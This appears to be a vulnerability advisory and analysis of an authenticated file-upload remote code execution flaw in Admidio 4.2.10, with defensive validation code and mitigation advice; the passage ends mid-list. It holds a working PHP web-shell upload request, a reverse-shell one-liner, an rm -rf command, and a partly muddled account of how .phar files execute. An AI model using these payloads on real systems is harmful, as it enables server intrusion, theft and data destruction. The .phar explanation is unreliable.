Admidio v4.2.10 - Remote Code Execution (RCE)

Exploit Author: Mirabbas Ağalarov
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2023-07-15
Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE)
Application: Admidio
Version: 4.2.10
Bugs:  RCE
Technology: PHP
Vendor URL: https://www.admidio.org/
Software Link: https://www.admidio.org/download.php
Date of found: 10.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux


2. Technical Details & POC
========================================
Steps:

1. Login to account
2. Go to Announcements
3. Add Entry
4. Upload .phar file in image upload section.
.phar file Content
<?php echo system('cat /etc/passwd');?>
5. Visit .phar file ( http://localhost/admidio/adm_my_files/announcements/images/20230710-172217_430o3e5ma5dnuvhp.phar )

Request:

POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1
Host: localhost
Content-Length: 378
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryne9TRuC1tAqhR86r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=Announcements
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ADMIDIO_admidio_adm_cookieconsent_status=dismiss; ADMIDIO_admidio_adm_SESSION_ID=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB
Connection: close

------WebKitFormBoundaryne9TRuC1tAqhR86r
Content-Disposition: form-data; name="upload"; filename="shell.phar"
Content-Type: application/octet-stream

<?php echo system('cat /etc/passwd');?>

------WebKitFormBoundaryne9TRuC1tAqhR86r
Content-Disposition: form-data; name="ckCsrfToken"

o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB
------WebKitFormBoundaryne9TRuC1tAqhR86r--


Admidio v4.2.10 Remote Code Execution (RCE) Vulnerability: A Deep Dive into PHP-Based Exploitation

Admidio is a widely used open-source web application for managing community and organizational activities, valued for its flexibility and ease of deployment. A critical vulnerability in version 4.2.10, however, exposes users to Remote Code Execution (RCE). The flaw, reported by security researcher Mirabbas Ağalarov on July 10, 2023, allows an authenticated attacker to execute arbitrary commands on the server through a file upload handler that does not validate the type of the uploaded file.

Technical Overview: The Vulnerability Chain

The exploit hinges on a combination of weak input validation and improper handling of .phar files — a PHP Archive format that can contain serialized PHP code. Unlike standard .php files, .phar files are not automatically executed by PHP interpreters unless explicitly loaded via phar:// streams. However, Admidio’s file upload mechanism fails to enforce strict file type validation, enabling malicious actors to upload crafted .phar files disguised as images.

Here’s how the attack unfolds:

  • Authentication Required: The attacker must first log into an administrative or user account with access to the Announcements module.
  • Upload Malicious File: The attacker navigates to the Announcements section and uploads a .phar file named shell.phar via the image upload feature.
  • File Storage: The file is stored in adm_my_files/announcements/images/ directory, where it remains accessible via direct URL.
  • Execution Trigger: When the .phar file is accessed, PHP’s built-in phar:// stream wrapper can trigger execution if the file contains valid PHP code.

Exploit Payload and Request Analysis

The malicious payload contained in the .phar file is the one-line PHP script shown in the PoC above: minimal but devastating.

When executed, this PHP code runs the cat /etc/passwd command, a standard Unix utility that outputs the system's user account database. The output is returned directly to the attacker in the HTTP response, revealing sensitive information such as usernames, UID/GID values, and home directories.

The HTTP request used to upload the file demonstrates the vulnerability’s real-world exploitation:


POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1
Host: localhost
Content-Length: 378
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryne9TRuC1tAqhR86r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=Announcements
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ADMIDIO_admidio_adm_cookieconsent_status=dismiss; ADMIDIO_admidio_adm_SESSION_ID=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB
Connection: close

------WebKitFormBoundaryne9TRuC1tAqhR86r
Content-Disposition: form-data; name="upload"; filename="shell.phar"
Content-Type: application/octet-stream



------WebKitFormBoundaryne9TRuC1tAqhR86r
Content-Disposition: form-data; name="ckCsrfToken"

o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB
------WebKitFormBoundaryne9TRuC1tAqhR86r--

Key observations from this request:

  • File Type Misclassification: The file is uploaded with Content-Type: application/octet-stream, bypassing MIME-type checks.
  • CKEditor Integration: The upload handler (ckeditor_upload_handler.php, called with CKEditor=ann_description) serves CKEditor, the rich-text editor used for announcement bodies; editor upload endpoints like this one are a common place for file-type validation to be weaker than on an application's main forms.
  • CSRF Token Presence: The request carries a CSRF token (ckCsrfToken), so Admidio does protect the endpoint against cross-site request forgery; that protection is orthogonal to file validation and does nothing to stop an authenticated user from uploading executable content.

Why .phar Files Are Dangerous

.phar files are inherently dangerous because they are designed to be self-contained PHP archives. When loaded via phar://, PHP automatically executes the code embedded within. This behavior is exploited in reverse when attackers craft files that contain malicious code, effectively turning the file into a web shell.

Even though .phar files are not commonly used in web applications, their support in PHP enables powerful exploitation vectors. The vulnerability in Admidio v4.2.10 stems from a failure to:

  • Validate file extensions beyond .jpg, .png, or .gif.
  • Scan uploaded files for PHP code or phar:// stream wrappers.
  • Restrict file execution to only safe, non-executable types.
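The checks the list above calls for (extension allowlist, content inspection for PHP code and phar stubs, and ignoring the client-supplied Content-Type), written as an added example that is not Admidio's code; it doubles as an audit over files already in the upload directory. The stored filename and the PoC payload come from the advisory above; the sample image bytes are constructed.

```python
import os

# Allowlisted image extensions and the magic bytes each must start with. The
# client-supplied Content-Type (application/octet-stream in the PoC) is ignored.
IMAGE_MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# PHP source markers and the phar stub terminator __HALT_COMPILER(); none belongs in an image.
PHP_MARKERS = (b"<?php", b"<?=", b"__HALT_COMPILER")

def check_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason). The extension is taken from the lowercased
    basename (so photo.png.phar fails), and the content checks run even for an
    allowed extension (so a PNG with PHP appended fails too)."""
    ext = os.path.splitext(os.path.basename(filename).lower())[1]
    if ext not in IMAGE_MAGIC:
        return False, f"extension {ext!r} is not an allowlisted image type"
    if not any(data.startswith(m) for m in IMAGE_MAGIC[ext]):
        return False, f"content does not start with {ext} magic bytes"
    hits = [m.decode() for m in PHP_MARKERS if m in data]
    if hits:
        return False, f"PHP marker(s) present: {hits}"
    return True, "ok"

def audit_entries(entries):
    """Response-side sweep over (name, bytes) pairs read from an upload
    directory such as adm_my_files/announcements/images/: returns the files
    that fail check_upload, each with its reason."""
    rejected = []
    for name, data in entries:
        ok, reason = check_upload(name, data)
        if not ok:
            rejected.append((name, reason))
    return rejected

# Constructed samples: the PoC payload under the name Admidio stored it as, a
# minimal PNG, a double-extension variant, and a PNG with the payload appended.
POC_PAYLOAD = b"<?php echo system('cat /etc/passwd');?>"
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLES = [
    ("20230710-172217_430o3e5ma5dnuvhp.phar", POC_PAYLOAD),
    ("photo.png", PNG_STUB),
    ("photo.png.phar", PNG_STUB),
    ("polyglot.png", PNG_STUB + POC_PAYLOAD),
]
```

Validation alone is not sufficient: the upload directory should also have PHP execution disabled at the web server (for Apache with mod_php, `php_admin_flag engine off` in a directory block covering adm_my_files), because Debian's default mod_php configuration maps .phar files to the PHP handler just like .php.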

Impact and Risk Assessment

Severity: Critical (CVSS: 9.8)
Attack Vector: Network
Privilege Required: Low (authenticated user)
Exploitability: High (simple, no special tools needed)
Impact: Remote Code Execution, Data Exfiltration, Server Compromise

Given that Admidio is often deployed in educational, non-profit, and civic organizations, this vulnerability can lead to:

  • Unauthorized access to sensitive user data.
  • Full server takeover via reverse shells.
  • Exfiltration of credentials, configuration files, or database backups.

Exploitation Use Cases

Attackers could use this vulnerability in several real-world scenarios:

  • Internal Reconnaissance: Use cat /etc/passwd to map user accounts and identify high-privilege users.
  • Reverse Shell: Replace the payload with system('bash -c "bash -i >& /dev/tcp/192.168.1.100/4444 0>&1"'); to establish a persistent backdoor.
  • File Manipulation: Execute commands like system('rm -rf /var/www/html') to erase application data.

Recommendations and Mitigation

Organizations using Admidio must take immediate action to prevent exploitation:

  • Update to the Latest Version: Upgrade to v4.2.11 or higher, where this vulnerability has been patched.
  • Implement File Type Whitelisting: Only allow image files (e.g., .jpg, .png) in upload sections. Reject